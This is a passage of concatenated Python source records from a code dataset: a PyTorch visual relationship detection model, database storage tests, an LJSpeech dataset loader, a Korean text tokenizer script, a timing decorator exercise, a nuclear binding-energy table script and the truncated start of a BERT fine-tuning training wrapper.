Run the multi-label classifier\n attr_out = self.features_to_attributes(img_features, pooled_regions, one_hot_label)\n if self.training:\n attr_loss = self.attr_loss_fn(attr_out, targets['attributes'].float())\n return attr_loss\n else:\n inferred_attr = torch.sigmoid(attr_out)\n attr_scores, attr_indexes = torch.sort(inferred_attr, dim=1, descending=True)\n return {'attributes': attr_indexes, 'attributes_scores': attr_scores}\n\n def features_to_attributes(self, img_features, pooled_regions, one_hot_label):\n raise NotImplementedError\n\n\nclass AttributesModelSingleNet(AttributesModelBase):\n def __init__(self, dataset):\n super().__init__(dataset)\n self.attributes_classifier = nn.Sequential(\n nn.Linear(4 * 4 * 256 + self.num_classes, 4096),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(4096, self.num_attributes),\n )\n\n def features_to_attributes(self, img_features, pooled_regions, one_hot_label):\n # Compute global image features\n # img_features_pooled = self.avgpool(img_features)\n # 1. Concatenate image_features, pooled_regions and labels\n attr_features = torch.cat(\n (\n pooled_regions.view(pooled_regions.size(0), -1), # K x (256*4*4)\n # img_features_pooled.view(-1).unsqueeze(0).expand(img_features_pooled.size(0), -1),\n # concatenate image level features to all the regions K x (256*4*4)\n one_hot_label.float() # K x num_classes\n ),\n dim=1\n )\n out = self.attributes_classifier(attr_features) # K x num_attr\n return out\n\n\nclass AttributesModelMultipleNets(AttributesModelBase):\n def __init__(self, dataset):\n super().__init__(dataset)\n self.final_classifier = nn.Sequential(\n nn.Linear(512 * 4 + 256, 4096),\n nn.ReLU(),\n nn.Linear(4096, 4096),\n nn.ReLU(),\n nn.Linear(4096, self.num_attributes),\n )\n\n self.labels_net = nn.Sequential(\n nn.Linear(self.num_classes, 256),\n nn.ReLU(),\n nn.Dropout(),\n nn.Linear(256, 256),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n self.objects_convnet = nn.Sequential(\n nn.Conv2d(256, 512, 2, stride=2),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.Dropout(),\n )\n\n def features_to_attributes(self, img_features, pooled_regions, one_hot_label):\n # Process labels\n p_label = self.labels_net(one_hot_label.float())\n\n p_objects = self.objects_convnet(pooled_regions)\n p_objects = p_objects.view(p_objects.size(0), -1)\n\n concat = torch.cat((p_label, p_objects), dim=1)\n\n out = self.final_classifier(concat) # K x num_attr\n return out\n\n\nclass VRD(nn.Module):\n def __init__(self, detector, dataset, finetune_detector=False, train_relationships=True,\n train_attributes=True, rel_context='relation_box', use_labels=True, max_objects=80, lam=1):\n super(VRD, self).__init__()\n\n # asserts\n assert train_relationships or train_attributes, \"You have to train one of relationships or attributes!\"\n assert not (rel_context is None and train_relationships), \"You have to specify a valid rel_context!\"\n\n self.detector = detector.module if isinstance(detector, nn.DataParallel) else detector\n self.cuda_on = False\n self.num_classes = dataset.num_classes()\n self.finetune_detector = finetune_detector\n self.rel_context = rel_context\n self.train_relationships = train_relationships\n self.train_attributes = train_attributes\n self.max_objects = max_objects\n self.lam = lam\n\n self.relationships_net = RelationshipsModelsMultipleNets(dataset, rel_context, use_labels) if train_relationships else None\n self.attributes_net = AttributesModelMultipleNets(dataset) if train_attributes else None\n\n def train(self, 
mode=True):\n self.detector.train(mode)\n return super().train(mode)\n\n def eval(self):\n self.detector.eval()\n return super().eval()\n\n def forward(self, images, targets=None):\n if self.training and targets is None:\n raise ValueError(\"In training mode, targets should be passed\")\n\n losses_dict = {}\n vrd_detections = []\n\n if self.training:\n # train pass in the detector, if we want\n if self.finetune_detector:\n det_loss = self.detector(images, targets)\n losses_dict.update(det_loss)\n\n # transform images and targets to match the ones processed by the detector\n images, targets = self.detector.transform(images, targets)\n\n # objects from every batch\n boxes = [t['boxes'] for t in targets]\n labels = [t['labels'] for t in targets] # labels from every batch\n else:\n # forward through the object detector in order to retrieve objects from the image\n detections = self.detector(images)\n boxes = [d['boxes'] for d in detections]\n labels = [d['labels'] for d in detections]\n\n # transform images and targets to match the ones processed by the detector\n images, targets = self.detector.transform(images, targets)\n\n image_features = self.detector.backbone(images.tensors)[3]\n\n if not self.finetune_detector:\n # detach the features from the graph so that we do not backprop through the detector\n image_features = image_features.detach().clone()\n\n # iterate through batch size\n attr_loss = 0\n rel_class_loss = 0\n rel_relationshipness_loss = 0\n for idx, (img, img_f, b, l) in enumerate(zip(images.tensors, image_features, boxes, labels)):\n # if evaluating and no objects are detected, return empty tensors\n if not self.training and b.shape[0] == 0:\n dummy_tensor = torch.FloatTensor([[0]])\n if self.cuda_on:\n dummy_tensor = dummy_tensor.cuda()\n vrd_detections.append({'relationships': dummy_tensor, 'relationships_scores': dummy_tensor,\n 'attributes': dummy_tensor, 'attributes_scores': dummy_tensor})\n break\n\n # Hard limit detected objects\n limit = self.max_objects\n how_many = b.size(0)\n if how_many > limit:\n b = b[:limit]\n l = l[:limit]\n if targets is not None:\n targets[idx]['labels'] = targets[idx]['labels'][:limit]\n targets[idx]['relationships'] = targets[idx]['relationships'][:limit, :limit]\n targets[idx]['attributes'] = targets[idx]['attributes'][:limit, :]\n # print('Skipping... 
too many objects ({})'.format(how_many))\n\n # compute the scale factor between the image dimensions and the feature map dimension\n scale_factor = np.array(img_f.shape[-2:]) / np.array(img.shape[-2:])\n assert scale_factor[0] == scale_factor[1]\n scale = scale_factor[0]\n\n pooled_regions = torchvision.ops.roi_align(img_f.unsqueeze(0), [b],\n output_size=(4, 4), spatial_scale=scale) # K x C x H x W\n\n # Prepare targets if needed (during training)\n t = targets[idx] if self.training else None\n\n vrd_detection_dict = {}\n\n # Train or Infer relationships\n if self.train_relationships:\n out_rel = self.relationships_net(b, l, t, img_f, pooled_regions, img.shape[-2:], scale)\n if self.training:\n # out_rel contains a loss value\n rel_class_loss += out_rel[0]\n rel_relationshipness_loss += out_rel[1]\n else:\n # out_rel contains detections\n vrd_detection_dict = out_rel\n\n # Train or Infer attributes\n if self.train_attributes:\n out_attr = self.attributes_net(b, l, t, img_f, pooled_regions)\n if self.training:\n # out_attr contains a loss value\n attr_loss += out_attr\n else:\n # out_attr contains detections\n vrd_detection_dict.update(out_attr)\n\n if not self.training:\n vrd_detections.append(vrd_detection_dict)\n\n if self.training:\n # Compute the mean losses over all detections for every batch\n #num_objects_total = sum([t['boxes'].size(0) for t in targets])\n attr_loss /= len(images.tensors)\n rel_class_loss /= len(images.tensors)\n rel_relationshipness_loss /= len(images.tensors)\n\n if self.train_relationships:\n losses_dict.update({'relationships_class_loss': self.lam * rel_class_loss})\n losses_dict.update({'relationshipness_loss': rel_relationshipness_loss})\n if self.train_attributes:\n losses_dict.update({'attributes_loss': attr_loss})\n\n return losses_dict\n\n else:\n # Merge boxes, inferred_attr and inferred_rels using the same interface of the detection in torchvision\n detections = [{**obj_det, **vrd_det} for obj_det, vrd_det in zip(detections, vrd_detections)]\n return detections\n\n def cuda(self, device=None):\n self.cuda_on = True\n if self.relationships_net is not None:\n self.relationships_net.cuda()\n if self.attributes_net is not None:\n self.attributes_net.cuda()\n return super().cuda(device)\n\n\n\n\n\n","sub_path":"models/vrd.py","file_name":"vrd.py","file_ext":"py","file_size_in_byte":39427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"648453959","text":"import pytest\nimport os\n\nfrom electrumx.server.storage import Storage, db_class\nfrom electrumx.lib.util import subclasses\n\n# Find out which db engines to test\n# Those that are not installed will be skipped\ndb_engines = []\nfor c in subclasses(Storage):\n try:\n c.import_module()\n except ImportError:\n db_engines.append(pytest.param(c.__name__, marks=pytest.mark.skip))\n else:\n db_engines.append(c.__name__)\n\n\n@pytest.fixture(params=db_engines)\ndef db(tmpdir, request):\n cwd = os.getcwd()\n os.chdir(str(tmpdir))\n db = db_class(request.param)(\"db\", False)\n yield db\n os.chdir(cwd)\n db.close()\n\n\ndef test_put_get(db):\n db.put(b\"x\", b\"y\")\n assert db.get(b\"x\") == b\"y\"\n\n\ndef test_batch(db):\n db.put(b\"a\", b\"1\")\n with db.write_batch() as b:\n b.put(b\"a\", b\"2\")\n assert db.get(b\"a\") == b\"1\"\n assert db.get(b\"a\") == b\"2\"\n\n\ndef test_iterator(db):\n \"\"\"\n The iterator should contain all key/value pairs starting with prefix\n ordered by key.\n \"\"\"\n for i in range(5):\n db.put(b\"abc\" + 
str.encode(str(i)), str.encode(str(i)))\n db.put(b\"abc\", b\"\")\n db.put(b\"a\", b\"xyz\")\n db.put(b\"abd\", b\"x\")\n assert list(db.iterator(prefix=b\"abc\")) == [(b\"abc\", b\"\")] + [\n (b\"abc\" + str.encode(str(i)), str.encode(str(i))) for\n i in range(5)\n ]\n\n\ndef test_iterator_reverse(db):\n for i in range(5):\n db.put(b\"abc\" + str.encode(str(i)), str.encode(str(i)))\n db.put(b\"a\", b\"xyz\")\n db.put(b\"abd\", b\"x\")\n assert list(db.iterator(prefix=b\"abc\", reverse=True)) == [\n (b\"abc\" + str.encode(str(i)), str.encode(str(i))) for\n i in reversed(range(5))\n ]\n\n\ndef test_iterator_seek(db):\n db.put(b\"first-key1\", b\"val\")\n db.put(b\"first-key2\", b\"val\")\n db.put(b\"first-key3\", b\"val\")\n db.put(b\"key-1\", b\"value-1\")\n db.put(b\"key-5\", b\"value-5\")\n db.put(b\"key-3\", b\"value-3\")\n db.put(b\"key-8\", b\"value-8\")\n db.put(b\"key-2\", b\"value-2\")\n db.put(b\"key-4\", b\"value-4\")\n db.put(b\"last-key1\", b\"val\")\n db.put(b\"last-key2\", b\"val\")\n db.put(b\"last-key3\", b\"val\")\n # forward-iterate, key present, no prefix\n it = db.iterator()\n it.seek(b\"key-4\")\n assert list(it) == [(b\"key-4\", b\"value-4\"), (b\"key-5\", b\"value-5\"), (b\"key-8\", b\"value-8\"),\n (b\"last-key1\", b\"val\"), (b\"last-key2\", b\"val\"), (b\"last-key3\", b\"val\")]\n # forward-iterate, key present\n it = db.iterator(prefix=b\"key-\")\n it.seek(b\"key-4\")\n assert list(it) == [(b\"key-4\", b\"value-4\"), (b\"key-5\", b\"value-5\"),\n (b\"key-8\", b\"value-8\")]\n # forward-iterate, key missing\n it = db.iterator(prefix=b\"key-\")\n it.seek(b\"key-6\")\n assert list(it) == [(b\"key-8\", b\"value-8\")]\n # forward-iterate, after last prefix\n it = db.iterator(prefix=b\"key-\")\n it.seek(b\"key-9\")\n assert list(it) == []\n # forward-iterate, after last, no prefix\n it = db.iterator()\n it.seek(b\"z\")\n assert list(it) == []\n # forward-iterate, no such prefix\n it = db.iterator(prefix=b\"key---\")\n it.seek(b\"key---5\")\n assert list(it) == []\n # forward-iterate, seek outside prefix\n it = db.iterator(prefix=b\"key-\")\n it.seek(b\"last-key2\")\n assert list(it) == []\n # reverse-iterate, key present\n it = db.iterator(prefix=b\"key-\", reverse=True)\n it.seek(b\"key-4\")\n assert list(it) == [(b\"key-3\", b\"value-3\"), (b\"key-2\", b\"value-2\"), (b\"key-1\", b\"value-1\")]\n # reverse-iterate, key missing\n it = db.iterator(prefix=b\"key-\", reverse=True)\n it.seek(b\"key-7\")\n assert list(it) == [(b\"key-5\", b\"value-5\"), (b\"key-4\", b\"value-4\"), (b\"key-3\", b\"value-3\"),\n (b\"key-2\", b\"value-2\"), (b\"key-1\", b\"value-1\")]\n # reverse-iterate, before first prefix\n it = db.iterator(prefix=b\"key-\", reverse=True)\n it.seek(b\"key-0\")\n assert list(it) == []\n # reverse-iterate, before first, no prefix\n it = db.iterator(reverse=True)\n it.seek(b\"a\")\n assert list(it) == []\n # reverse-iterate, no such prefix\n it = db.iterator(prefix=b\"key---\", reverse=True)\n it.seek(b\"key---5\")\n assert list(it) == []\n # reverse-iterate, seek outside prefix\n it = db.iterator(prefix=b\"key-\", reverse=True)\n it.seek(b\"first-key2\")\n assert list(it) == []\n\n\ndef test_close(db):\n db.put(b\"a\", b\"b\")\n db.close()\n db = db_class(db.__class__.__name__)(\"db\", False)\n assert db.get(b\"a\") == b\"b\"\n","sub_path":"tests/server/test_storage.py","file_name":"test_storage.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} 
+{"seq_id":"377825935","text":"import os\nimport csv\nfrom typing import List, Tuple\n\nimport torchaudio\nfrom torchaudio.datasets.utils import download_url, extract_archive, unicode_csv_reader\nfrom torch import Tensor\nfrom torch.utils.data import Dataset\n\nURL = \"https://data.keithito.com/data/speech/LJSpeech-1.1.tar.bz2\"\nFOLDER_IN_ARCHIVE = \"wavs\"\n_CHECKSUMS = {\n \"https://data.keithito.com/data/speech/LJSpeech-1.1.tar.bz2\":\n \"be1a30453f28eb8dd26af4101ae40cbf2c50413b1bb21936cbcdc6fae3de8aa5\"\n}\n\n\ndef load_ljspeech_item(line: List[str], path: str, ext_audio: str) -> Tuple[Tensor, int, str, str]:\n assert len(line) == 3\n fileid, transcript, normalized_transcript = line\n fileid_audio = fileid + ext_audio\n fileid_audio = os.path.join(path, fileid_audio)\n\n # Load audio\n waveform, sample_rate = torchaudio.load(fileid_audio)\n\n return (\n waveform,\n sample_rate,\n transcript,\n normalized_transcript,\n )\n\n\nclass LJSPEECH(Dataset):\n \"\"\"\n Create a Dataset for LJSpeech-1.1. Each item is a tuple of the form:\n waveform, sample_rate, transcript, normalized_transcript\n \"\"\"\n\n _ext_audio = \".wav\"\n _ext_archive = '.tar.bz2'\n\n def __init__(self,\n root: str,\n url: str = URL,\n folder_in_archive: str = FOLDER_IN_ARCHIVE,\n download: bool = False) -> None:\n\n basename = os.path.basename(url)\n archive = os.path.join(root, basename)\n\n basename = basename.split(self._ext_archive)[0]\n folder_in_archive = os.path.join(basename, folder_in_archive)\n\n self._path = os.path.join(root, folder_in_archive)\n self._metadata_path = os.path.join(root, basename, 'metadata.csv')\n\n if download:\n if not os.path.isdir(self._path):\n if not os.path.isfile(archive):\n checksum = _CHECKSUMS.get(url, None)\n download_url(url, root, hash_value=checksum)\n extract_archive(archive)\n\n with open(self._metadata_path, \"r\") as metadata:\n walker = unicode_csv_reader(metadata, delimiter=\"|\", quoting=csv.QUOTE_NONE)\n self._walker = list(walker)\n\n def __getitem__(self, n: int) -> Tuple[Tensor, int, str, str]:\n line = self._walker[n]\n return load_ljspeech_item(line, self._path, self._ext_audio)\n\n def __len__(self) -> int:\n return len(self._walker)\n","sub_path":"torchaudio/datasets/ljspeech.py","file_name":"ljspeech.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"212836146","text":"import json\nimport pandas as pd\nimport argparse\nfrom konlpy.tag import Mecab\n\n\n# parser 생성\nparser = argparse.ArgumentParser(description='set option')\nparser.add_argument(\"--file_name\", type=str,\n default='service_center',\n help=\"please set file name ex) service_center\")\nargs = parser.parse_args()\nfname = args.file_name\n\n\n# 치환 사전 불러오기\nwith open('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/clustering_data/'+fname+'/substitution_dict.txt', 'r') as file:\n substitution_dict = json.load(file)\n\n\ndf = pd.read_csv('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/ELBERT_data/sentiment_analyzed/test.tsv')\ndf['text'] = df['text'].str.upper()\n\nnegative = df[df.label==0]\n\nprint('긍정 및 중립 개수:', len(df))\nprint('부정 개수:', len(negative))\n\n# 단어 치환 하기\nfor key in substitution_dict:\n for word in substitution_dict[key]:\n negative['text'] = negative['text'].str.replace(word, key)\n\n\n# txt 파일로 저장\nnegative['text'].to_csv('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/clustering_data/service_center/txt/'+fname+'.txt',\n index=False, header=False)\n\n\n# 
\nf = open('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/clustering_data/service_center/txt/'+fname+'.txt', 'r')\nf2 = open('/content/drive/Shareddrives/capstone/Elegant_Friends/rsc/clustering_data/service_center/tokenized_data/'+fname+'.txt', 'w')\n\nmecab = Mecab()\nlines = f.readlines()[1:]\n\nfor line in lines:\n nouns = mecab.nouns(line)\n f2.write(\" \".join(nouns) + '\\n')\n\nf.close()\nf2.close()\n\n","sub_path":"src/clustering/tokenizing.py","file_name":"tokenizing.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"374154589","text":"\"\"\"\n Author: Moiseenko Pavel, group No. 1, subgroup No. 2.\n\n Independent work 2. Task: develop a decorator function that measures\n the execution time of the decorated function.\n\n\"\"\"\n\nfrom datetime import datetime\n\n\ndef lead_time(func):\n def wrapper():\n start = datetime.now()\n result = func()\n print(datetime.now() - start)\n return result\n return wrapper\n\n\n@lead_time\ndef number():\n list_of_numbers = []\n for i in range(10000):\n list_of_numbers.append(i)\n return list_of_numbers\n\n\nprint(number())\n","sub_path":"4-semester/programming/indepworkvar2-1.py","file_name":"indepworkvar2-1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"335750430","text":"#For calculation of odd values please refer to: http://massexplorer.frib.msu.edu/content/masstables/Odd_Values_from_Even_Data.pdf\n\ndef readFile(DataFileIn,DataFileOut):\n # These are the locations of Neutron #, Proton #, Binding Energy, Neutron pairing energy, Proton pairing energy in the RMF mass table files from: \"Global performance of covariant energy density functionals: Ground state observables of even-even nuclei and the estimate of theoretical uncertainties\", Physical Review C 89, 054320 (2014)\n an = 1\n az = 0\n ae = 3\n apn = 6\n apz = 7\n CC = 13 #define padding for each column\n f1 = open(str(DataFileIn))\n output = open(str(DataFileOut), \"w\")\n lines = f1.readlines()\n BindE={} #Creates an empty dictionary for binding energy\n PairN = {} #Creates an empty dictionary for neutron pairing gap\n PairZ = {} #Creates an empty dictionary for proton pairing gap\n S1p = {} #Creates an empty dictionary for 1 proton separation energy\n S2p = {} #Creates an empty dictionary for 2 proton separation energy\n S1n = {} #Creates an empty dictionary for 1 neutron separation energy\n S2n = {} #Creates an empty dictionary for 2 neutron separation energy\n Qa = {} #Creates an empty dictionary for Q_alpha value (Q value for alpha decay)
\n outputStr = \"Z\".ljust(5) + \"N\".ljust(5) + \"Binding_E_(MeV)\".ljust(CC+5) + \"S_1p_(MeV)\".ljust(CC) + \"S_2p_(MeV)\".ljust(CC) + \"S_1n_(MeV)\".ljust(CC) + \"S_2n_(MeV)\".ljust(CC) + \"Q_alpha_(MeV)\".ljust(CC)\n output.write(outputStr)\n # function that detects if arg. is a number\n def isNum(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n nMax = 2\n zMax = 2\n for line in lines:\n ss = line.split()\n #print(ss)\n try:\n N = int(float(ss[int(an)])+0.0001) #Number of Neutrons\n nThis = N\n Z = int(float(ss[int(az)])+0.0001) #Number of Protons\n zThis = Z\n if (nThis > nMax):\n nMax = nThis\n if (zThis > zMax):\n zMax = zThis\n BindE[(N,Z)] = float(ss[int(ae)]) #Binding Energy Dict\n PairN[(N,Z)] = -float(ss[int(apn)])\n PairZ[(N,Z)] = -float(ss[int(apz)])\n # For each even-even data on file, the following computes binding energies of its neighbours as follows:\n # (Z-1,N-1) * * (Z-1, N)\n # \\ |\n # \\ |\n # (Z, N-1) * --- * (even Z,even N)\n #\n #Compute Odd-Z Even-N Binding energies\n if ((N,Z) in BindE and (N,Z-2) in BindE and (N,Z) in PairZ and (N,Z-2) in PairZ):\n BindE[(N,Z-1)] = 0.5 * ( BindE[(N,Z)] + BindE[(N,Z-2)] + PairZ[(N,Z)] + PairZ[(N,Z-2)] )\n #Compute Even-Z Odd-N Binding energies\n if ((N,Z) in BindE and (N-2,Z) in BindE and (N,Z) in PairN and (N-2,Z) in PairN):\n BindE[(N-1,Z)] = 0.5 * ( BindE[(N,Z)] + BindE[(N-2,Z)] + PairN[(N,Z)] + PairN[(N-2,Z)] )\n #Compute Odd-N Proton Pairing gaps, this is required for Odd-Z Odd-N Binding energies computation\n if ((N,Z) in PairZ and (N-2,Z) in PairZ):\n PairZ[(N-1,Z)] = 0.5 * ( PairZ[(N,Z)] + PairZ[(N-2,Z)] )\n #Compute Odd-Z Odd-N Binding energies, this code works because the mass table is ordered in Proton number first, thus the complete Z-2 data is guaranteed to exist when the following lines are executed\n if ((N-1,Z) in BindE and (N-1,Z-2) in BindE and (N-1,Z) in PairZ and (N-1,Z-2) in PairZ):\n BindE[(N-1,Z-1)] = 0.5 * ( BindE[(N-1,Z)] + BindE[(N-1,Z-2)] + PairZ[(N-1,Z)] + PairZ[(N-1,Z-2)] )\n #!!!\n #!!! At this point, all odd-odd, odd-even, even-odd Binding energies are computed and stored !!!
\n #!!!\n except (ValueError, IndexError): # N, Z, or BE are not numbers\n continue\n for Z in range(2,zMax+1):\n for N in range(2,nMax+1):\n if ((N,Z) in BindE):\n outputStr = \"\\n\" + str(Z).ljust(5) + str(N).ljust(5) + str(BindE[(N,Z)]).ljust(CC+5)\n if ((N,Z-1) in BindE):\n S1p[(N,Z)] = BindE[(N,Z-1)] - BindE[(N,Z)]\n outputStr = outputStr + str( round( S1p[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n if ((N,Z-2) in BindE):\n S2p[(N,Z)] = BindE[(N,Z-2)] - BindE[(N,Z)]\n outputStr = outputStr + str( round( S2p[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n if ((N-1,Z) in BindE):\n S1n[(N,Z)] = BindE[(N-1,Z)] - BindE[(N,Z)]\n outputStr = outputStr + str( round( S1n[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n if ((N-2,Z) in BindE):\n S2n[(N,Z)] = BindE[(N-2,Z)] - BindE[(N,Z)]\n outputStr = outputStr + str( round( S2n[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n if ((N-2,Z-2) in BindE):\n Qa[(N,Z)] = 28.3 + BindE[(N,Z)] - BindE[(N-2,Z-2)]\n outputStr = outputStr + str( round( Qa[(N,Z)]+0.00000001,6 ) ).ljust(CC)\n else:\n outputStr = outputStr + \"*\".ljust(CC)\n output.write(outputStr)\n\n f1.close()\n output.close()\n\n\nDataFileIn='RMFnoHeader/ddme2-tableNH.dat'\nDataFileOut='RMFCompleteTable/ddme2-sep.dat'\nreadFile(DataFileIn,DataFileOut) #arg: (DataFileIn,DataFileOut)\n\nDataFileIn='RMFnoHeader/ddmed-tableNH.dat'\nDataFileOut='RMFCompleteTable/ddmed-sep.dat'\nreadFile(DataFileIn,DataFileOut) #arg: (DataFileIn,DataFileOut)\n\nDataFileIn='RMFnoHeader/ddpc1-tableNH.dat'\nDataFileOut='RMFCompleteTable/ddpc1-sep.dat'\nreadFile(DataFileIn,DataFileOut) #arg: (DataFileIn,DataFileOut)\n\nDataFileIn='RMFnoHeader/nl3s-tableNH.dat'\nDataFileOut='RMFCompleteTable/nl3s-sep.dat'\nreadFile(DataFileIn,DataFileOut) #arg: (DataFileIn,DataFileOut)\n\n","sub_path":"neutron_dripline/S2n_Residuals_no_dripline/data_modify/RMF_data_mod/RMF_S2_mod.py","file_name":"RMF_S2_mod.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"117783899","text":"from transfer.downstream.finetune.env.imports import pdb, OrderedDict, json, torch, re, np, SummaryWriter, time, os, sys, git\nfrom transfer.downstream.finetune.io_.logger import printing\nfrom transfer.downstream.finetune.env.gpu_tools.gpu_info import use_gpu_, printout_allocated_gpu_memory\n\nfrom transfer.downstream.finetune.env.flags import REPORT_FLAG_DIR_STR\nfrom transfer.downstream.finetune.io_.manage_dirs.make_dirs import setup_repoting_location\nfrom transfer.downstream.finetune.model.optimization.get_optmizers import apply_fine_tuning_strategy\n\ntry:\n from transfer.downstream.finetune.io_.runs_tracker.google_sheet_report import update_status\nexcept:\n update_status = None\n\nfrom transfer.downstream.finetune.io_.data_iterator import readers_load, data_gen_multi_task_sampling_batch\nfrom transfer.downstream.finetune.io_.dat import conllu_data\n\nfrom transfer.downstream.finetune.io_.build_files_shard import build_shard\nfrom transfer.downstream.finetune.io_.get_new_batcher import get_new_shard\n\nfrom transfer.downstream.finetune.trainer.tools.multi_task_tools import get_vocab_size_and_dictionary_per_task, update_batch_size_mean
\nfrom transfer.downstream.finetune.trainer.epoch_run import epoch_run\nfrom transfer.downstream.finetune.model.architecture.get_model import get_model_multi_task_bert\nfrom transfer.downstream.finetune.io_.report.report_tools import write_args, get_hyperparameters_dict, get_dataset_label, get_name_model_id_with_extra_name\n\nfrom transfer.downstream.finetune.env.dir.project_directories import CHECKPOINT_BERT_DIR\nfrom transfer.downstream.finetune.env.vars import N_SENT_MAX_CONLL_PER_SHARD\nfrom transfer.downstream.finetune.model.settings import TASKS_PARAMETER\nfrom transfer.downstream.finetune.transformers.transformers.tokenization_bert import BertTokenizer\nfrom transfer.downstream.finetune.transformers.transformers.tokenization_xlm import XLMTokenizer\n\n\ndef run(args,\n n_observation_max_per_epoch_train,\n vocab_size, model_dir,\n voc_tokenizer, auxilliary_task_norm_not_norm,\n null_token_index, null_str, tokenizer,\n n_observation_max_per_epoch_dev_test=None,\n run_mode=\"train\",\n dict_path=None, end_predictions=None,\n report=True,\n model_suffix=\"\", description=\"\",\n saving_every_epoch=10,\n model_location=None, model_id=None,\n report_full_path_shared=None, skip_1_t_n=False,\n heuristic_test_ls=None,\n remove_mask_str_prediction=False, inverse_writing=False,\n extra_label_for_prediction=\"\",\n random_iterator_train=True, bucket_test=False, must_get_norm_test=True,\n early_stoppin_metric=None, subsample_early_stoping_metric_val=None,\n compute_intersection_score_test=True,\n threshold_edit=3,\n name_with_epoch=False,max_token_per_batch=200,\n encoder=None,\n debug=False, verbose=1):\n\n \"\"\"\n Wrapper for training/prediction/evaluation.\n\n Two modes: train (trains using the train and dev iterators, with a test pass at the end on test_path)\n test (only tests at the end; requires all directories to already exist)\n :return:\n \"\"\"\n assert run_mode in [\"train\", \"test\"], \"ERROR run mode {} corrupted \".format(run_mode)\n input_level_ls = [\"wordpiece\"]\n assert early_stoppin_metric is not None and subsample_early_stoping_metric_val is not None, \"ERROR : early_stoppin_metric and subsample_early_stoping_metric_val should be defined \"\n if n_observation_max_per_epoch_dev_test is None:\n n_observation_max_per_epoch_dev_test = n_observation_max_per_epoch_train\n printing(\"MODEL : RUNNING IN {} mode\", var=[run_mode], verbose=verbose, verbose_level=1)\n printing(\"WARNING : casing was set to {} (this should be consistent at train and test)\", var=[args.case], verbose=verbose, verbose_level=2)\n\n if len(args.tasks) == 1:\n printing(\"INFO : MODEL : 1 set of simultaneous tasks {}\".format(args.tasks), verbose=verbose, verbose_level=1)\n\n if run_mode == \"test\":\n assert args.test_paths is not None and isinstance(args.test_paths, list)\n if run_mode == \"train\":\n printing(\"CHECKPOINTING info : \"\n \"saving model every {}\", var=saving_every_epoch, verbose=verbose, verbose_level=1)\n\n use_gpu = use_gpu_(use_gpu=None, verbose=verbose)\n\n def get_commit_id():\n repo = git.Repo(os.path.dirname(os.path.realpath(__file__)), search_parent_directories=True)\n git_commit_id = str(repo.head.commit) # object.hexsha\n return git_commit_id\n if verbose>1:\n print(f\"GIT ID : {get_commit_id()}\")\n\n train_data_label = get_dataset_label(args.train_path, default=\"train\")\n\n iter_train = 0\n iter_dev = 0\n row = None\n writer = None\n\n printout_allocated_gpu_memory(verbose, \"{} starting all\".format(model_id))\n\n if run_mode == \"train\":
\n if os.path.isdir(args.train_path[0]) and len(args.train_path) == 1:\n data_sharded = args.train_path[0]\n printing(\"INFO : args.train_path is a directory so not rebuilding shards\", verbose=verbose, verbose_level=1)\n elif os.path.isdir(args.train_path[0]):\n raise(Exception(\" {} is a directory but {} train paths were given, more than one is not supported\".format(args.train_path[0], len(args.train_path))))\n else:\n data_sharded = None\n assert model_location is None and model_id is None, \"ERROR : we are creating a new model so model_location and model_id must be None \"\n\n model_id, model_location, dict_path, tensorboard_log, end_predictions, data_sharded \\\n = setup_repoting_location(model_suffix=model_suffix, data_sharded=data_sharded,\n root_dir_checkpoints=CHECKPOINT_BERT_DIR,\n shared_id=args.overall_label, verbose=verbose)\n hyperparameters = get_hyperparameters_dict(args, args.case, random_iterator_train, seed=args.seed, verbose=verbose,\n dict_path=dict_path,\n model_id=model_id, model_location=model_location)\n args_dir = write_args(model_location, model_id=model_id, hyperparameters=hyperparameters, verbose=verbose)\n\n if report:\n if report_full_path_shared is not None:\n tensorboard_log = os.path.join(report_full_path_shared, \"tensorboard\")\n printing(\"tensorboard --logdir={} --host=localhost --port=1234 \", var=[tensorboard_log], verbose_level=1,verbose=verbose)\n writer = SummaryWriter(log_dir=tensorboard_log)\n if writer is not None:\n writer.add_text(\"INFO-ARGUMENT-MODEL-{}\".format(model_id), str(hyperparameters), 0)\n else:\n args_checkpoint = json.load(open(args.init_args_dir, \"r\"))\n dict_path = args_checkpoint[\"hyperparameters\"][\"dict_path\"]\n assert dict_path is not None and os.path.isdir(dict_path), \"ERROR {} \".format(dict_path)\n end_predictions = args.end_predictions\n assert end_predictions is not None and os.path.isdir(end_predictions), \"ERROR end_predictions\"\n model_location = args_checkpoint[\"hyperparameters\"][\"model_location\"]\n model_id = args_checkpoint[\"hyperparameters\"][\"model_id\"]\n assert model_location is not None and model_id is not None, \"ERROR model_location model_id \"\n args_dir = os.path.join(model_location, \"{}-args.json\".format(model_id))\n\n printing(\"CHECKPOINTING : starting to write logs \\ntensorboard --logdir={} --host=localhost --port=1234 \",\n var=[os.path.join(model_id, \"tensorboard\")], verbose_level=1,\n 